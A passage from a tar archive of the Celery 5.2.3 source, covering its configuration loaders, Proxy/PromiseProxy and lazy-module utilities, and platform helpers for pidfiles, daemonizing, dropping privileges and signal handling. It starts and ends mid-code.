ns.key=value|ns_key=value (case insensitive) key, value = arg.split('=', 1) key = key.lower().replace('.', '_') # ## find name-space. # .key=value|_key=value expands to default name-space. if key[0] == '_': ns, key = namespace, key[1:] else: # find name-space part of key ns, key = key.split('_', 1) ns_key = (ns and ns + '_' or '') + key # (type)value makes cast to custom type. cast = re_type.match(value) if cast: type_ = cast.groups()[0] type_ = override_types.get(type_, type_) value = value[len(cast.group()):] value = typemap[type_](value) else: try: value = NAMESPACES[ns.lower()][key].to_python(value) except ValueError as exc: # display key name in error message. raise ValueError(f'{ns_key!r}: {exc}') return ns_key, value return dict(getarg(arg) for arg in args) def read_configuration(self, env='CELERY_CONFIG_MODULE'): try: custom_config = os.environ[env] except KeyError: pass else: if custom_config: usercfg = self._import_config_module(custom_config) return DictAttribute(usercfg) def autodiscover_tasks(self, packages, related_name='tasks'): self.task_modules.update( mod.__name__ for mod in autodiscover_tasks(packages or (), related_name) if mod) @cached_property def default_modules(self): return ( tuple(self.builtin_modules) + tuple(maybe_list(self.app.conf.imports)) + tuple(maybe_list(self.app.conf.include)) ) @property def conf(self): """Loader configuration.""" if self._conf is unconfigured: self._conf = self.read_configuration() return self._conf def autodiscover_tasks(packages, related_name='tasks'): global _RACE_PROTECTION if _RACE_PROTECTION: return () _RACE_PROTECTION = True try: return [find_related_module(pkg, related_name) for pkg in packages] finally: _RACE_PROTECTION = False def find_related_module(package, related_name): """Find module in package.""" # Django 1.7 allows for specifying a class name in INSTALLED_APPS. # (Issue #2248). try: module = importlib.import_module(package) if not related_name and module: return module except ImportError: package, _, _ = package.rpartition('.') if not package: raise module_name = f'{package}.{related_name}' try: return importlib.import_module(module_name) except ImportError as e: import_exc_name = getattr(e, 'name', module_name) if import_exc_name is not None and import_exc_name != module_name: raise e return ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/loaders/default.py0000664000175000017500000000276000000000000017614 0ustar00asifasif00000000000000"""The default loader used when no custom app has been initialized.""" import os import warnings from celery.exceptions import NotConfigured from celery.utils.collections import DictAttribute from celery.utils.serialization import strtobool from .base import BaseLoader __all__ = ('Loader', 'DEFAULT_CONFIG_MODULE') DEFAULT_CONFIG_MODULE = 'celeryconfig' #: Warns if configuration file is missing if :envvar:`C_WNOCONF` is set. C_WNOCONF = strtobool(os.environ.get('C_WNOCONF', False)) class Loader(BaseLoader): """The loader used by the default app.""" def setup_settings(self, settingsdict): return DictAttribute(settingsdict) def read_configuration(self, fail_silently=True): """Read configuration from :file:`celeryconfig.py`.""" configname = os.environ.get('CELERY_CONFIG_MODULE', DEFAULT_CONFIG_MODULE) try: usercfg = self._import_config_module(configname) except ImportError: if not fail_silently: raise # billiard sets this if forked using execv if C_WNOCONF and not os.environ.get('FORKED_BY_MULTIPROCESSING'): warnings.warn(NotConfigured( 'No {module} module found! Please make sure it exists and ' 'is available to Python.'.format(module=configname))) return self.setup_settings({}) else: self.configured = True return self.setup_settings(usercfg) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/local.py0000664000175000017500000003767000000000000015641 0ustar00asifasif00000000000000"""Proxy/PromiseProxy implementation. This module contains critical utilities that needs to be loaded as soon as possible, and that shall not load any third party modules. Parts of this module is Copyright by Werkzeug Team. """ import operator import sys from functools import reduce from importlib import import_module from types import ModuleType __all__ = ('Proxy', 'PromiseProxy', 'try_import', 'maybe_evaluate') __module__ = __name__ # used by Proxy class body def _default_cls_attr(name, type_, cls_value): # Proxy uses properties to forward the standard # class attributes __module__, __name__ and __doc__ to the real # object, but these needs to be a string when accessed from # the Proxy class directly. This is a hack to make that work. # -- See Issue #1087. def __new__(cls, getter): instance = type_.__new__(cls, cls_value) instance.__getter = getter return instance def __get__(self, obj, cls=None): return self.__getter(obj) if obj is not None else self return type(name, (type_,), { '__new__': __new__, '__get__': __get__, }) def try_import(module, default=None): """Try to import and return module. Returns None if the module does not exist. """ try: return import_module(module) except ImportError: return default class Proxy: """Proxy to another object.""" # Code stolen from werkzeug.local.Proxy. __slots__ = ('__local', '__args', '__kwargs', '__dict__') def __init__(self, local, args=None, kwargs=None, name=None, __doc__=None): object.__setattr__(self, '_Proxy__local', local) object.__setattr__(self, '_Proxy__args', args or ()) object.__setattr__(self, '_Proxy__kwargs', kwargs or {}) if name is not None: object.__setattr__(self, '__custom_name__', name) if __doc__ is not None: object.__setattr__(self, '__doc__', __doc__) @_default_cls_attr('name', str, __name__) def __name__(self): try: return self.__custom_name__ except AttributeError: return self._get_current_object().__name__ @_default_cls_attr('qualname', str, __name__) def __qualname__(self): try: return self.__custom_name__ except AttributeError: return self._get_current_object().__qualname__ @_default_cls_attr('module', str, __module__) def __module__(self): return self._get_current_object().__module__ @_default_cls_attr('doc', str, __doc__) def __doc__(self): return self._get_current_object().__doc__ def _get_class(self): return self._get_current_object().__class__ @property def __class__(self): return self._get_class() def _get_current_object(self): """Get current object. This is useful if you want the real object behind the proxy at a time for performance reasons or because you want to pass the object into a different context. """ loc = object.__getattribute__(self, '_Proxy__local') if not hasattr(loc, '__release_local__'): return loc(*self.__args, **self.__kwargs) try: # pragma: no cover # not sure what this is about return getattr(loc, self.__name__) except AttributeError: # pragma: no cover raise RuntimeError(f'no object bound to {self.__name__}') @property def __dict__(self): try: return self._get_current_object().__dict__ except RuntimeError: # pragma: no cover raise AttributeError('__dict__') def __repr__(self): try: obj = self._get_current_object() except RuntimeError: # pragma: no cover return f'<{self.__class__.__name__} unbound>' return repr(obj) def __bool__(self): try: return bool(self._get_current_object()) except RuntimeError: # pragma: no cover return False __nonzero__ = __bool__ # Py2 def __dir__(self): try: return dir(self._get_current_object()) except RuntimeError: # pragma: no cover return [] def __getattr__(self, name): if name == '__members__': return dir(self._get_current_object()) return getattr(self._get_current_object(), name) def __setitem__(self, key, value): self._get_current_object()[key] = value def __delitem__(self, key): del self._get_current_object()[key] def __setslice__(self, i, j, seq): self._get_current_object()[i:j] = seq def __delslice__(self, i, j): del self._get_current_object()[i:j] def __setattr__(self, name, value): setattr(self._get_current_object(), name, value) def __delattr__(self, name): delattr(self._get_current_object(), name) def __str__(self): return str(self._get_current_object()) def __lt__(self, other): return self._get_current_object() < other def __le__(self, other): return self._get_current_object() <= other def __eq__(self, other): return self._get_current_object() == other def __ne__(self, other): return self._get_current_object() != other def __gt__(self, other): return self._get_current_object() > other def __ge__(self, other): return self._get_current_object() >= other def __hash__(self): return hash(self._get_current_object()) def __call__(self, *a, **kw): return self._get_current_object()(*a, **kw) def __len__(self): return len(self._get_current_object()) def __getitem__(self, i): return self._get_current_object()[i] def __iter__(self): return iter(self._get_current_object()) def __contains__(self, i): return i in self._get_current_object() def __getslice__(self, i, j): return self._get_current_object()[i:j] def __add__(self, other): return self._get_current_object() + other def __sub__(self, other): return self._get_current_object() - other def __mul__(self, other): return self._get_current_object() * other def __floordiv__(self, other): return self._get_current_object() // other def __mod__(self, other): return self._get_current_object() % other def __divmod__(self, other): return self._get_current_object().__divmod__(other) def __pow__(self, other): return self._get_current_object() ** other def __lshift__(self, other): return self._get_current_object() << other def __rshift__(self, other): return self._get_current_object() >> other def __and__(self, other): return self._get_current_object() & other def __xor__(self, other): return self._get_current_object() ^ other def __or__(self, other): return self._get_current_object() | other def __div__(self, other): return self._get_current_object().__div__(other) def __truediv__(self, other): return self._get_current_object().__truediv__(other) def __neg__(self): return -(self._get_current_object()) def __pos__(self): return +(self._get_current_object()) def __abs__(self): return abs(self._get_current_object()) def __invert__(self): return ~(self._get_current_object()) def __complex__(self): return complex(self._get_current_object()) def __int__(self): return int(self._get_current_object()) def __float__(self): return float(self._get_current_object()) def __oct__(self): return oct(self._get_current_object()) def __hex__(self): return hex(self._get_current_object()) def __index__(self): return self._get_current_object().__index__() def __coerce__(self, other): return self._get_current_object().__coerce__(other) def __enter__(self): return self._get_current_object().__enter__() def __exit__(self, *a, **kw): return self._get_current_object().__exit__(*a, **kw) def __reduce__(self): return self._get_current_object().__reduce__() class PromiseProxy(Proxy): """Proxy that evaluates object once. :class:`Proxy` will evaluate the object each time, while the promise will only evaluate it once. """ __slots__ = ('__pending__', '__weakref__') def _get_current_object(self): try: return object.__getattribute__(self, '__thing') except AttributeError: return self.__evaluate__() def __then__(self, fun, *args, **kwargs): if self.__evaluated__(): return fun(*args, **kwargs) from collections import deque try: pending = object.__getattribute__(self, '__pending__') except AttributeError: pending = None if pending is None: pending = deque() object.__setattr__(self, '__pending__', pending) pending.append((fun, args, kwargs)) def __evaluated__(self): try: object.__getattribute__(self, '__thing') except AttributeError: return False return True def __maybe_evaluate__(self): return self._get_current_object() def __evaluate__(self, _clean=('_Proxy__local', '_Proxy__args', '_Proxy__kwargs')): try: thing = Proxy._get_current_object(self) except Exception: raise else: object.__setattr__(self, '__thing', thing) for attr in _clean: try: object.__delattr__(self, attr) except AttributeError: # pragma: no cover # May mask errors so ignore pass try: pending = object.__getattribute__(self, '__pending__') except AttributeError: pass else: try: while pending: fun, args, kwargs = pending.popleft() fun(*args, **kwargs) finally: try: object.__delattr__(self, '__pending__') except AttributeError: # pragma: no cover pass return thing def maybe_evaluate(obj): """Attempt to evaluate promise, even if obj is not a promise.""" try: return obj.__maybe_evaluate__() except AttributeError: return obj # ############# Module Generation ########################## # Utilities to dynamically # recreate modules, either for lazy loading or # to create old modules at runtime instead of # having them litter the source tree. # import fails in python 2.5. fallback to reduce in stdlib MODULE_DEPRECATED = """ The module %s is deprecated and will be removed in a future version. """ DEFAULT_ATTRS = {'__file__', '__path__', '__doc__', '__all__'} # im_func is no longer available in Py3. # instead the unbound method itself can be used. def fun_of_method(method): return method def getappattr(path): """Get attribute from current_app recursively. Example: ``getappattr('amqp.get_task_consumer')``. """ from celery import current_app return current_app._rgetattr(path) COMPAT_MODULES = { 'celery': { 'execute': { 'send_task': 'send_task', }, 'log': { 'get_default_logger': 'log.get_default_logger', 'setup_logger': 'log.setup_logger', 'setup_logging_subsystem': 'log.setup_logging_subsystem', 'redirect_stdouts_to_logger': 'log.redirect_stdouts_to_logger', }, 'messaging': { 'TaskConsumer': 'amqp.TaskConsumer', 'establish_connection': 'connection', 'get_consumer_set': 'amqp.TaskConsumer', }, 'registry': { 'tasks': 'tasks', }, }, } #: We exclude these from dir(celery) DEPRECATED_ATTRS = set(COMPAT_MODULES['celery'].keys()) | {'subtask'} class class_property: def __init__(self, getter=None, setter=None): if getter is not None and not isinstance(getter, classmethod): getter = classmethod(getter) if setter is not None and not isinstance(setter, classmethod): setter = classmethod(setter) self.__get = getter self.__set = setter info = getter.__get__(object) # just need the info attrs. self.__doc__ = info.__doc__ self.__name__ = info.__name__ self.__module__ = info.__module__ def __get__(self, obj, type=None): if obj and type is None: type = obj.__class__ return self.__get.__get__(obj, type)() def __set__(self, obj, value): if obj is None: return self return self.__set.__get__(obj)(value) def setter(self, setter): return self.__class__(self.__get, setter) def reclassmethod(method): return classmethod(fun_of_method(method)) class LazyModule(ModuleType): _compat_modules = () _all_by_module = {} _direct = {} _object_origins = {} def __getattr__(self, name): if name in self._object_origins: module = __import__(self._object_origins[name], None, None, [name]) for item in self._all_by_module[module.__name__]: setattr(self, item, getattr(module, item)) return getattr(module, name) elif name in self._direct: # pragma: no cover module = __import__(self._direct[name], None, None, [name]) setattr(self, name, module) return module return ModuleType.__getattribute__(self, name) def __dir__(self): return [ attr for attr in set(self.__all__) | DEFAULT_ATTRS if attr not in DEPRECATED_ATTRS ] def __reduce__(self): return import_module, (self.__name__,) def create_module(name, attrs, cls_attrs=None, pkg=None, base=LazyModule, prepare_attr=None): fqdn = '.'.join([pkg.__name__, name]) if pkg else name cls_attrs = {} if cls_attrs is None else cls_attrs pkg, _, modname = name.rpartition('.') cls_attrs['__module__'] = pkg attrs = { attr_name: (prepare_attr(attr) if prepare_attr else attr) for attr_name, attr in attrs.items() } module = sys.modules[fqdn] = type( modname, (base,), cls_attrs)(name) module.__dict__.update(attrs) return module def recreate_module(name, compat_modules=None, by_module=None, direct=None, base=LazyModule, **attrs): compat_modules = compat_modules or () by_module = by_module or {} direct = direct or {} old_module = sys.modules[name] origins = get_origins(by_module) compat_modules = COMPAT_MODULES.get(name, ()) _all = tuple(set(reduce( operator.add, [tuple(v) for v in [compat_modules, origins, direct, attrs]], ))) cattrs = { '_compat_modules': compat_modules, '_all_by_module': by_module, '_direct': direct, '_object_origins': origins, '__all__': _all, } new_module = create_module(name, attrs, cls_attrs=cattrs, base=base) new_module.__dict__.update({ mod: get_compat_module(new_module, mod) for mod in compat_modules }) return old_module, new_module def get_compat_module(pkg, name): def prepare(attr): if isinstance(attr, str): return Proxy(getappattr, (attr,)) return attr attrs = COMPAT_MODULES[pkg.__name__][name] if isinstance(attrs, str): fqdn = '.'.join([pkg.__name__, name]) module = sys.modules[fqdn] = import_module(attrs) return module attrs['__all__'] = list(attrs) return create_module(name, dict(attrs), pkg=pkg, prepare_attr=prepare) def get_origins(defs): origins = {} for module, attrs in defs.items(): origins.update({attr: module for attr in attrs}) return origins ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/platforms.py0000664000175000017500000006173400000000000016554 0ustar00asifasif00000000000000"""Platforms. Utilities dealing with platform specifics: signals, daemonization, users, groups, and so on. """ import atexit import errno import math import numbers import os import platform as _platform import signal as _signal import sys import warnings from collections import namedtuple from contextlib import contextmanager from billiard.compat import close_open_fds, get_fdmax from billiard.util import set_pdeathsig as _set_pdeathsig # fileno used to be in this module from kombu.utils.compat import maybe_fileno from kombu.utils.encoding import safe_str from .exceptions import SecurityError, SecurityWarning, reraise from .local import try_import try: from billiard.process import current_process except ImportError: # pragma: no cover current_process = None _setproctitle = try_import('setproctitle') resource = try_import('resource') pwd = try_import('pwd') grp = try_import('grp') mputil = try_import('multiprocessing.util') __all__ = ( 'EX_OK', 'EX_FAILURE', 'EX_UNAVAILABLE', 'EX_USAGE', 'SYSTEM', 'IS_macOS', 'IS_WINDOWS', 'SIGMAP', 'pyimplementation', 'LockFailed', 'get_fdmax', 'Pidfile', 'create_pidlock', 'close_open_fds', 'DaemonContext', 'detached', 'parse_uid', 'parse_gid', 'setgroups', 'initgroups', 'setgid', 'setuid', 'maybe_drop_privileges', 'signals', 'signal_name', 'set_process_title', 'set_mp_process_title', 'get_errno_name', 'ignore_errno', 'fd_by_path', 'isatty', ) # exitcodes EX_OK = getattr(os, 'EX_OK', 0) EX_FAILURE = 1 EX_UNAVAILABLE = getattr(os, 'EX_UNAVAILABLE', 69) EX_USAGE = getattr(os, 'EX_USAGE', 64) EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73) SYSTEM = _platform.system() IS_macOS = SYSTEM == 'Darwin' IS_WINDOWS = SYSTEM == 'Windows' DAEMON_WORKDIR = '/' PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | (os.R_OK) PIDLOCKED = """ERROR: Pidfile ({0}) already exists. Seems we're already running? (pid: {1})""" _range = namedtuple('_range', ('start', 'stop')) ROOT_DISALLOWED = """\ Running a worker with superuser privileges when the worker accepts messages serialized with pickle is a very bad idea! If you really want to continue then you have to set the C_FORCE_ROOT environment variable (but please think about this before you do). User information: uid={uid} euid={euid} gid={gid} egid={egid} """ ROOT_DISCOURAGED = """\ You're running the worker with superuser privileges: this is absolutely not recommended! Please specify a different user using the --uid option. User information: uid={uid} euid={euid} gid={gid} egid={egid} """ ASSUMING_ROOT = """\ An entry for the specified gid or egid was not found. We're assuming this is a potential security issue. """ SIGNAMES = { sig for sig in dir(_signal) if sig.startswith('SIG') and '_' not in sig } SIGMAP = {getattr(_signal, name): name for name in SIGNAMES} def isatty(fh): """Return true if the process has a controlling terminal.""" try: return fh.isatty() except AttributeError: pass def pyimplementation(): """Return string identifying the current Python implementation.""" if hasattr(_platform, 'python_implementation'): return _platform.python_implementation() elif sys.platform.startswith('java'): return 'Jython ' + sys.platform elif hasattr(sys, 'pypy_version_info'): v = '.'.join(str(p) for p in sys.pypy_version_info[:3]) if sys.pypy_version_info[3:]: v += '-' + ''.join(str(p) for p in sys.pypy_version_info[3:]) return 'PyPy ' + v else: return 'CPython' class LockFailed(Exception): """Raised if a PID lock can't be acquired.""" class Pidfile: """Pidfile. This is the type returned by :func:`create_pidlock`. See Also: Best practice is to not use this directly but rather use the :func:`create_pidlock` function instead: more convenient and also removes stale pidfiles (when the process holding the lock is no longer running). """ #: Path to the pid lock file. path = None def __init__(self, path): self.path = os.path.abspath(path) def acquire(self): """Acquire lock.""" try: self.write_pid() except OSError as exc: reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2]) return self __enter__ = acquire def is_locked(self): """Return true if the pid lock exists.""" return os.path.exists(self.path) def release(self, *args): """Release lock.""" self.remove() __exit__ = release def read_pid(self): """Read and return the current pid.""" with ignore_errno('ENOENT'): with open(self.path) as fh: line = fh.readline() if line.strip() == line: # must contain '\n' raise ValueError( f'Partial or invalid pidfile {self.path}') try: return int(line.strip()) except ValueError: raise ValueError( f'pidfile {self.path} contents invalid.') def remove(self): """Remove the lock.""" with ignore_errno(errno.ENOENT, errno.EACCES): os.unlink(self.path) def remove_if_stale(self): """Remove the lock if the process isn't running. I.e. process does not respons to signal. """ try: pid = self.read_pid() except ValueError: print('Broken pidfile found - Removing it.', file=sys.stderr) self.remove() return True if not pid: self.remove() return True try: os.kill(pid, 0) except os.error as exc: if exc.errno == errno.ESRCH or exc.errno == errno.EPERM: print('Stale pidfile exists - Removing it.', file=sys.stderr) self.remove() return True except SystemError: print('Stale pidfile exists - Removing it.', file=sys.stderr) self.remove() return True return False def write_pid(self): pid = os.getpid() content = f'{pid}\n' pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE) pidfile = os.fdopen(pidfile_fd, 'w') try: pidfile.write(content) # flush and sync so that the re-read below works. pidfile.flush() try: os.fsync(pidfile_fd) except AttributeError: # pragma: no cover pass finally: pidfile.close() rfh = open(self.path) try: if rfh.read() != content: raise LockFailed( "Inconsistency: Pidfile content doesn't match at re-read") finally: rfh.close() PIDFile = Pidfile # XXX compat alias def create_pidlock(pidfile): """Create and verify pidfile. If the pidfile already exists the program exits with an error message, however if the process it refers to isn't running anymore, the pidfile is deleted and the program continues. This function will automatically install an :mod:`atexit` handler to release the lock at exit, you can skip this by calling :func:`_create_pidlock` instead. Returns: Pidfile: used to manage the lock. Example: >>> pidlock = create_pidlock('/var/run/app.pid') """ pidlock = _create_pidlock(pidfile) atexit.register(pidlock.release) return pidlock def _create_pidlock(pidfile): pidlock = Pidfile(pidfile) if pidlock.is_locked() and not pidlock.remove_if_stale(): print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr) raise SystemExit(EX_CANTCREAT) pidlock.acquire() return pidlock def fd_by_path(paths): """Return a list of file descriptors. This method returns list of file descriptors corresponding to file paths passed in paths variable. Arguments: paths: List[str]: List of file paths. Returns: List[int]: List of file descriptors. Example: >>> keep = fd_by_path(['/dev/urandom', '/my/precious/']) """ stats = set() for path in paths: try: fd = os.open(path, os.O_RDONLY) except OSError: continue try: stats.add(os.fstat(fd)[1:3]) finally: os.close(fd) def fd_in_stats(fd): try: return os.fstat(fd)[1:3] in stats except OSError: return False return [_fd for _fd in range(get_fdmax(2048)) if fd_in_stats(_fd)] class DaemonContext: """Context manager daemonizing the process.""" _is_open = False def __init__(self, pidfile=None, workdir=None, umask=None, fake=False, after_chdir=None, after_forkers=True, **kwargs): if isinstance(umask, str): # octal or decimal, depending on initial zero. umask = int(umask, 8 if umask.startswith('0') else 10) self.workdir = workdir or DAEMON_WORKDIR self.umask = umask self.fake = fake self.after_chdir = after_chdir self.after_forkers = after_forkers self.stdfds = (sys.stdin, sys.stdout, sys.stderr) def redirect_to_null(self, fd): if fd is not None: dest = os.open(os.devnull, os.O_RDWR) os.dup2(dest, fd) def open(self): if not self._is_open: if not self.fake: self._detach() os.chdir(self.workdir) if self.umask is not None: os.umask(self.umask) if self.after_chdir: self.after_chdir() if not self.fake: # We need to keep /dev/urandom from closing because # shelve needs it, and Beat needs shelve to start. keep = list(self.stdfds) + fd_by_path(['/dev/urandom']) close_open_fds(keep) for fd in self.stdfds: self.redirect_to_null(maybe_fileno(fd)) if self.after_forkers and mputil is not None: mputil._run_after_forkers() self._is_open = True __enter__ = open def close(self, *args): if self._is_open: self._is_open = False __exit__ = close def _detach(self): if os.fork() == 0: # first child os.setsid() # create new session if os.fork() > 0: # pragma: no cover # second child os._exit(0) else: os._exit(0) return self def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0, workdir=None, fake=False, **opts): """Detach the current process in the background (daemonize). Arguments: logfile (str): Optional log file. The ability to write to this file will be verified before the process is detached. pidfile (str): Optional pid file. The pidfile won't be created, as this is the responsibility of the child. But the process will exit if the pid lock exists and the pid written is still running. uid (int, str): Optional user id or user name to change effective privileges to. gid (int, str): Optional group id or group name to change effective privileges to. umask (str, int): Optional umask that'll be effective in the child process. workdir (str): Optional new working directory. fake (bool): Don't actually detach, intended for debugging purposes. **opts (Any): Ignored. Example: >>> from celery.platforms import detached, create_pidlock >>> with detached( ... logfile='/var/log/app.log', ... pidfile='/var/run/app.pid', ... uid='nobody'): ... # Now in detached child process with effective user set to nobody, ... # and we know that our logfile can be written to, and that ... # the pidfile isn't locked. ... pidlock = create_pidlock('/var/run/app.pid') ... ... # Run the program ... program.run(logfile='/var/log/app.log') """ if not resource: raise RuntimeError('This platform does not support detach.') workdir = os.getcwd() if workdir is None else workdir signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler. maybe_drop_privileges(uid=uid, gid=gid) def after_chdir_do(): # Since without stderr any errors will be silently suppressed, # we need to know that we have access to the logfile. logfile and open(logfile, 'a').close() # Doesn't actually create the pidfile, but makes sure it's not stale. if pidfile: _create_pidlock(pidfile).release() return DaemonContext( umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do, ) def parse_uid(uid): """Parse user id. Arguments: uid (str, int): Actual uid, or the username of a user. Returns: int: The actual uid. """ try: return int(uid) except ValueError: try: return pwd.getpwnam(uid).pw_uid except (AttributeError, KeyError): raise KeyError(f'User does not exist: {uid}') def parse_gid(gid): """Parse group id. Arguments: gid (str, int): Actual gid, or the name of a group. Returns: int: The actual gid of the group. """ try: return int(gid) except ValueError: try: return grp.getgrnam(gid).gr_gid except (AttributeError, KeyError): raise KeyError(f'Group does not exist: {gid}') def _setgroups_hack(groups): # :fun:`setgroups` may have a platform-dependent limit, # and it's not always possible to know in advance what this limit # is, so we use this ugly hack stolen from glibc. groups = groups[:] while 1: try: return os.setgroups(groups) except ValueError: # error from Python's check. if len(groups) <= 1: raise groups[:] = groups[:-1] except OSError as exc: # error from the OS. if exc.errno != errno.EINVAL or len(groups) <= 1: raise groups[:] = groups[:-1] def setgroups(groups): """Set active groups from a list of group ids.""" max_groups = None try: max_groups = os.sysconf('SC_NGROUPS_MAX') except Exception: # pylint: disable=broad-except pass try: return _setgroups_hack(groups[:max_groups]) except OSError as exc: if exc.errno != errno.EPERM: raise if any(group not in groups for group in os.getgroups()): # we shouldn't be allowed to change to this group. raise def initgroups(uid, gid): """Init process group permissions. Compat version of :func:`os.initgroups` that was first added to Python 2.7. """ if not pwd: # pragma: no cover return username = pwd.getpwuid(uid)[0] if hasattr(os, 'initgroups'): # Python 2.7+ return os.initgroups(username, gid) groups = [gr.gr_gid for gr in grp.getgrall() if username in gr.gr_mem] setgroups(groups) def setgid(gid): """Version of :func:`os.setgid` supporting group names.""" os.setgid(parse_gid(gid)) def setuid(uid): """Version of :func:`os.setuid` supporting usernames.""" os.setuid(parse_uid(uid)) def maybe_drop_privileges(uid=None, gid=None): """Change process privileges to new user/group. If UID and GID is specified, the real user/group is changed. If only UID is specified, the real user is changed, and the group is changed to the users primary group. If only GID is specified, only the group is changed. """ if sys.platform == 'win32': return if os.geteuid(): # no point trying to setuid unless we're root. if not os.getuid(): raise SecurityError('contact support') uid = uid and parse_uid(uid) gid = gid and parse_gid(gid) if uid: _setuid(uid, gid) else: gid and setgid(gid) if uid and not os.getuid() and not os.geteuid(): raise SecurityError('Still root uid after drop privileges!') if gid and not os.getgid() and not os.getegid(): raise SecurityError('Still root gid after drop privileges!') def _setuid(uid, gid): # If GID isn't defined, get the primary GID of the user. if not gid and pwd: gid = pwd.getpwuid(uid).pw_gid # Must set the GID before initgroups(), as setgid() # is known to zap the group list on some platforms. # setgid must happen before setuid (otherwise the setgid operation # may fail because of insufficient privileges and possibly stay # in a privileged group). setgid(gid) initgroups(uid, gid) # at last: setuid(uid) # ... and make sure privileges cannot be restored: try: setuid(0) except OSError as exc: if exc.errno != errno.EPERM: raise # we should get here: cannot restore privileges, # everything was fine. else: raise SecurityError( 'non-root user able to restore privileges after setuid.') if hasattr(_signal, 'setitimer'): def _arm_alarm(seconds): _signal.setitimer(_signal.ITIMER_REAL, seconds) else: def _arm_alarm(seconds): _signal.alarm(math.ceil(seconds)) class Signals: """Convenience interface to :mod:`signals`. If the requested signal isn't supported on the current platform, the operation will be ignored. Example: >>> from celery.platforms import signals >>> from proj.handlers import my_handler >>> signals['INT'] = my_handler >>> signals['INT'] my_handler >>> signals.supported('INT') True >>> signals.signum('INT') 2 >>> signals.ignore('USR1') >>> signals['USR1'] == signals.ignored True >>> signals.reset('USR1') >>> signals['USR1'] == signals.default True >>> from proj.handlers import exit_handler, hup_handler >>> signals.update(INT=exit_handler, ... TERM=exit_handler, ... HUP=hup_handler) """ ignored = _signal.SIG_IGN default = _signal.SIG_DFL def arm_alarm(self, seconds): return _arm_alarm(seconds) def reset_alarm(self): return _signal.alarm(0) def supported(self, name): """Return true value if signal by ``name`` exists on this platform.""" try: self.signum(name) except AttributeError: return False else: return True def signum(self, name): """Get signal number by name.""" if isinstance(name, numbers.Integral): return name if not isinstance(name, str) \ or not name.isupper(): raise TypeError('signal name must be uppercase string.') if not name.startswith('SIG'): name = 'SIG' + name return getattr(_signal, name) def reset(self, *signal_names): """Reset signals to the default signal handler. Does nothing if the platform has no support for signals, or the specified signal in particular. """ self.update((sig, self.default) for sig in signal_names) def ignore(self, *names): """Ignore signal using :const:`SIG_IGN`. Does nothing if the platform has no support for signals, or the specified signal in particular. """ self.update((sig, self.ignored) for sig in names) def __getitem__(self, name): return _signal.getsignal(self.signum(name)) def __setitem__(self, name, handler): """Install signal handler. Does nothing if the current platform has no support for signals, or the specified signal in particular. """ try: _signal.signal(self.signum(name), handler) except (AttributeError, ValueError): pass def update(self, _d_=None, **sigmap): """Set signal handlers from a mapping.""" for name, handler in dict(_d_ or {}, **sigmap).items(): self[name] = handler signals = Signals() get_signal = signals.signum # compat install_signal_handler = signals.__setitem__ # compat reset_signal = signals.reset # compat ignore_signal = signals.ignore # compat def signal_name(signum): """Return name of signal from signal number.""" return SIGMAP[signum][3:] def strargv(argv): arg_start = 2 if 'manage' in argv[0] else 1 if len(argv) > arg_start: return ' '.join(argv[arg_start:]) return '' def set_pdeathsig(name): """Sends signal ``name`` to process when parent process terminates.""" if signals.supported('SIGKILL'): try: _set_pdeathsig(signals.signum('SIGKILL')) except OSError: # We ignore when OS does not support set_pdeathsig pass def set_process_title(progname, info=None): """Set the :command:`ps` name for the currently running process. Only works if :pypi:`setproctitle` is installed. """ proctitle = f'[{progname}]' proctitle = f'{proctitle} {info}' if info else proctitle if _setproctitle: _setproctitle.setproctitle(safe_str(proctitle)) return proctitle if os.environ.get('NOSETPS'): # pragma: no cover def set_mp_process_title(*a, **k): """Disabled feature.""" else: def set_mp_process_title(progname, info=None, hostname=None): """Set the :command:`ps` name from the current process name. Only works if :pypi:`setproctitle` is installed. """ if hostname: progname = f'{progname}: {hostname}' name = current_process().name if current_process else 'MainProcess' return set_process_title(f'{progname}:{name}', info=info) def get_errno_name(n): """Get errno for string (e.g., ``ENOENT``).""" if isinstance(n, str): return getattr(errno, n) return n @contextmanager def ignore_errno(*errnos, **kwargs): """Context manager to ignore specific POSIX error codes. Takes a list of error codes to ignore: this can be either the name of the code, or the code integer itself:: >>> with ignore_errno('ENOENT'): ... with open('foo', 'r') as fh: ... return fh.read() >>> with ignore_errno(errno.ENOENT, errno.EPERM): ... pass Arguments: types (Tuple[Exception]): A tuple of exceptions to ignore (when the errno matches). Defaults to :exc:`Exception`. """ types = kwargs.get('types') or (Exception,) errnos = [get_errno_name(errno) for errno in errnos] try: yield except types as exc: if not hasattr(exc, 'errno'): raise if exc.errno not in errnos: raise def check_privileges(accept_content): if grp is None or pwd is None: return pickle_or_serialize = ('pickle' in accept_content or 'application/group-python-serialize' in accept_content) uid = os.getuid() if hasattr(os, 'getuid') else 65535 gid = os.getgid() if hasattr(os, 'getgid') else 65535 euid = os.geteuid() if hasattr(os, 'geteuid') else 65535 egid = os.getegid() if hasattr(os, 'getegid') else 65535 if hasattr(os, 'fchown'): if not all(hasattr(os, attr) for attr in ('getuid', 'getgid', 'geteuid', 'getegid')): raise SecurityError('suspicious platform, contact support') # Get the group database entry for the current user's group and effective # group id using grp.getgrgid() method # We must handle the case where either the gid or the egid are not found. try: gid_entry = grp.getgrgid(gid) egid_entry = grp.getgrgid(egid) except KeyError: warnings.warn(SecurityWarning(ASSUMING_ROOT)) _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize) return # Get the group and effective group name based on gid gid_grp_name = gid_entry[0] egid_grp_name = egid_entry[0] # Create lists to use in validation step later. gids_in_use = (gid_grp_name, egid_grp_name) groups_with_security_risk = ('sudo', 'wheel') is_root = uid == 0 or euid == 0 # Confirm that the gid and egid are not one that # can be used to escalate privileges. if is_root or any(group in gids_in_use for group in 